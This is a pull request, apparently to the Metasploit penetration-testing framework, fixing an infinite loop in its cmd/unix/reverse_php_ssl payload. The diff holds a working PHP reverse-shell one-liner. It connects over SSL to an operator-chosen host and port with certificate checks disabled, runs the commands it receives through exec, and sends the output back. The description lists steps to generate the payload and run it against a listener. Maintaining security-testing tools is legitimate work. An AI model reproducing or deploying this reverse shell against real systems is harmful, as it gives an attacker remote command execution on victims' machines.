### PR TITLE
Fix reverse_php_ssl infinite loop

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 132
+  CachedSize = 253
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -49,6 +49,6 @@ module MetasploitModule
     lhost = datastore['LHOST']
     ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
+    cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
   end
 end


### PR DESCRIPTION
Fix for #8672 

Uses php streams to explicitly disable verify_peer option for tls sockets.
A connect timeout of 30 seconds has been added
feof is not suitable for tcp streams, replaced with fgets as while statement predicate

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use use payloads/cmd/unix/reverse_php_ssl`
- [x] `set LHOST 0.0.0.0`
- [x] `set LPORT 4433`
- [x] generate -t raw
- [x] ...
- [x] Setup tls socket listening on port 4433 using self signed certificate
- [x] Copy generated payload and run. It should connect without flooding with error messages

## Additional

- [ ] The stream context can be expanded to use a custom CA  http://php.net/manual/en/context.ssl.php  
